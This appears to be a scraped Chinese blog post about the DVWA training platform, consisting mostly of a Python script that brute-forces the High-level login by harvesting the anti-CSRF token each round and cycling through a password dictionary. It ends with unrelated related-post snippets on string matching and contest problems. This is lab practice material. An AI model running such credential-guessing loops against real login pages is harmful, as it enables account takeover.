Brute Force-python

阿新 • • 發佈：2017-05-23

timeout 腳本 gin txt form exc time ges cte

本篇文章主要圍繞DVWA滲透測試平臺，暴力破解-High級別

分析部分略去，直接上腳本代碼：

coding:utf-8
#author:freem

import requests
from bs4 import BeautifulSoup
import urllib

header={
‘Accept‘: ‘text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8‘,
‘Accept-Encoding‘:‘gzip, deflate‘,
‘Accept-Language‘:‘zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 
‘,
‘Cookie‘:‘security=high; PHPSESSID=5jr7egbt0r324aklohb699u2q1‘,
‘Host‘:‘192.168.207.129‘,
‘Referer‘:‘http://192.168.207.129/DVWA/vulnerabilities/brute/index.php‘,
‘Upgrade-Insecure-Requests‘:‘1‘,
‘User-Agent‘:‘Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0‘,
‘Connection‘: ‘keep-alive‘ 

} #headers
def get_content(request_url,headers): #用於請求
    try:
        if request_url is None:
            return ""
        response=requests.get(request_url,headers=headers,timeout=20)
        response.raise_for_status()
        response.encoding=response.apparent_encoding
        return 
 response.text
        # print(len(response.text))
        # print(response.text)
    except :
        print("Please be careful of exception!")
        print(requests.ConnectionError.strerror)
def get_detail(url):
    try:
        if url is None:
            return ""
        response=requests.get(url,timeout=20)
        response.raise_for_status()
        response.encoding=response.apparent_encoding
        return response.text
        # print(response.text)
    except :
        print("Please be careful of exception!")
        print(requests.ConnectionError.strerror)
def get_taken(url,content):  #用於獲取
    if url is None or content is None:
        return None
    soup=BeautifulSoup(content,‘html.parser‘)
    taken=soup.find(‘form‘).find(‘input‘,type="hidden")
    # print(taken)
    user_taken=taken[‘value‘]
    # print(type(user_taken))
    return user_taken

def brute_force(user_taken,passwd,successful_check,header):  #單個頁面破解
    brute_url=‘http://192.168.207.129/DVWA/vulnerabilities/brute/?username=admin&password=123456789&Login=Login&user_token=‘+user_taken
    brute_page=requests.get(brute_url,headers=header).text
    # print(brute_page)
    if successful_check in brute_page:
        print("username:admin\n+password:"+passwd+"\n brute_force successufl!")
    else:
        print("failed ~~~~~~~~")

def brute_force_dir(user_taken,file,successful_check,header): #字典破解
    with open(file,‘r‘) as f: #打開字典文件
        for line in f:
            passwd=line  #每次讀取一行，並且賦值給passwd作為密碼，帶入url
            brute_url=‘http://192.168.207.129/DVWA/vulnerabilities/brute/?username=admin&password=‘+passwd.strip()+‘&Login=Login&user_token=‘+user_taken
            print(brute_url)
            brute_page=get_content(brute_url,header)
            user_taken = get_taken(brute_url, brute_page) #或許當前user_taken 值
            # print(user_taken)
            print(len(brute_page))
            if successful_check in brute_page:   #如果匹配成功，給出成功提示
                print("username:admin\npassword:"+passwd+"\n brute_force successufl!")
            else:
                print("username:admin\npassword:"+passwd+"\n brute_force faild~~") #匹配失敗


url=‘http://192.168.207.129/DVWA/vulnerabilities/brute/‘
successful_check="Welcome to the password protected area"
content=get_content(url,header)
print(len(content))
# print(content)
user_taken=get_taken(url,content)
password="ppp.txt" #字典文件ppp.txt
# password="123456789"
# brute_force(url,user_taken,password,successful_check,header)
brute_force_dir(user_taken,password,successful_check,header)

結果如下：

技術分享

Brute Force-python

timeout 腳本 gin txt form exc time ges cte 本篇文章主要圍繞DVWA滲透測試平臺，暴力破解-High級別分析部分略去，直接上腳本代碼： coding:utf-8 #author:freem import request

HDU 6215 Brute Force Sorting（鏈表）

show 滿足 .cn namespace freopen vector 題意判斷 type http://acm.hdu.edu.cn/showproblem.php?pid=6215 題意：給出一個序列，對於每個數，它必須大於等於它前一個數，小於等於後一個數，如果不

HDU 6215 Brute Force Sorting

刪掉 cnblogs code span cstring con class -- 模擬一層一層刪鏈表模擬 #include <iostream> #include <cstring> #include <algorithm> #

hdu6215 Brute Force Sorting（模擬）

n) 很多利用暴力模擬所有只需要維護需要刪除題意　　給一個長度為n(n<=1e5)的序列，如果一個位置i滿足a[i-1]>a[i]或者a[i]>a[i+1]，那麽我們就稱該位置是不合法的位置　　先把序列中所有不合法的位置統一找出來，

【20171121早】DVWA練習：low級別之Brute Force

con content word int 4.2 books 安全主機每次 0x00：簡介　　DVWA是滲透測試網站，想研究安全的兄弟們可以安裝在自己的虛擬機中，沒事的時候攻破著玩，老黑最近在玩這個，當然也遇到了坑爹的事情，話不多說，直接開始！ 0x01：環境

【安全牛學習筆記】SQLMAP自動註入-ENUMERATION、BRUTE FORCE、UDF IN

信息安全 security+ sqlmap自動註入偽靜態頁面不能註入，這是錯誤的！SQLMAP自動註入08-----ENUMERATION--current-user--current-db--hostname--users--privileges -U username (CU當前賬號）--r

字符串處理------Brute Force與KMP

else alt .com instead att i++ 記得 n! include 一，字符串的簡單介紹例：POJ1488 　　http://poj.org/problem?id=1488 題意：替換文本中的雙引號； #include <iostre

Brute-Force模式匹配演算法兩種實現方式

1. public static int indexOf(String mainStr,String subString,int start) { if((mainStr.length()<subString.length()) || mainStr==null || subStr

java實現Brute-Force和KMP模式匹配

Brute-Force模式匹配演算法從主串第start（i=start）個字元起，與模式串t的第一個字元（j=0）開始比較。若相等，則繼續比較後面字元（i++，j++）若不相等，則從主串第二個字元起重新和模式串t比較（i=i-j+1，j=0）若都匹配成功，則返回模式串t第

Brute-Force 演算法與KMP演算法

串的模式匹配串的模式匹配也叫查詢定位，指的是在當前串中尋找模式串的過程。主要的模式匹配演算法有 Brute-Force 演算法和 KMP 演算法； Brute-Force 演算法 Brute-Force 演算法從主串的第一個字元開始和模式串的第一個字元進行比較，若相等，則繼續

HDU 6215 Brute Force Sorting（雙向連結串列+佇列）

Brute Force Sorting Time Limit: 1000/1000 MS (Java/Others) Memory Limit: 65535/32768 K (Java/Others) Total Submission(s): 2304 Acce

Brute Force Sorting HDU

Beerus needs to sort an array of N integers. Algorithms are not Beerus's strength. Destruction is what he excels. He can destroy all unsor

DVWA之Brute Force(暴力破解)

暴力破解是指使用窮舉法，舉出所有的可能的結果，然後逐一驗證是否正確！ Low 原始碼： <?php if( isset( $_GET[ 'Login' ] ) ) { // Get username $user = $_GET[ 'username

字串匹配之Brute-Force演算法

簡單模式匹配演算法(BF演算法) //匹配成功返回str2在str1中shou首次出現的位置 public static int BForce(String str1, String str2) { int i = 0, j = 0; while (i <

程式碼審計—DWVA—Brute Force—High

0x00 前言 0x01 start 直接看原始碼吧。首先這裡是一個token的獲取，其實之前一直都在想，都有token了還可以繼續爆破嗎。回答是可以的，只要這個token，我們也可以獲取到，就可

Use GuardDuty to Identify Brute Force Attacks

You can use GuardDuty to monitor and detect suspicious behavior in your AWS environment. Consider this example that uses GuardDuty to troublesh

資料結構例程——串的模式匹配（Brute-Force演算法）

問題：模式匹配，設有主串s和子串t，在主串s中找到一個與子串t相等的子串。解答：（標頭檔案sqstring.h見順序串演算法庫） #include <stdio.h> #inc

特徵匹配之Brute-Force 匹配和FLANN 匹配器

使用 OpenCV 中的蠻力(Brute-Force)匹配和 FLANN 匹配。 1：Brute-Force 匹配的基礎蠻力匹配器是很簡單的。首先在第一幅影象中選取一個關鍵點然後依次與第二幅影象的每個關鍵點進行(描述符)距離測試,最後返回距離最近的關鍵點。

HDU 4971 A simple brute force（網路流）

題意：給你一些專案以及完成專案可以得到的收益，再給你專案和需要解決問題的關係，完成問題的順序是要分先後的，問你按照什麼順序來可以讓總的預算最少。一開始看到這題的時候感覺建圖很難受，知道是網路流，但是不知道要算什麼，看了最大權閉包才知道，這算是落

DVWA Brute Force漏洞利用(Security Level : high)

由於加入了Anti-CSRFtoken預防無腦爆破，這裡就不推薦用Burpsuite了，還是簡單用python寫個指令碼吧。借用lonehand指令碼（python 2.7），使用者名稱為admin，對password引數進行爆破並列印結果，但因為版本問題，獲取user_to

Brute Force-python

相關推薦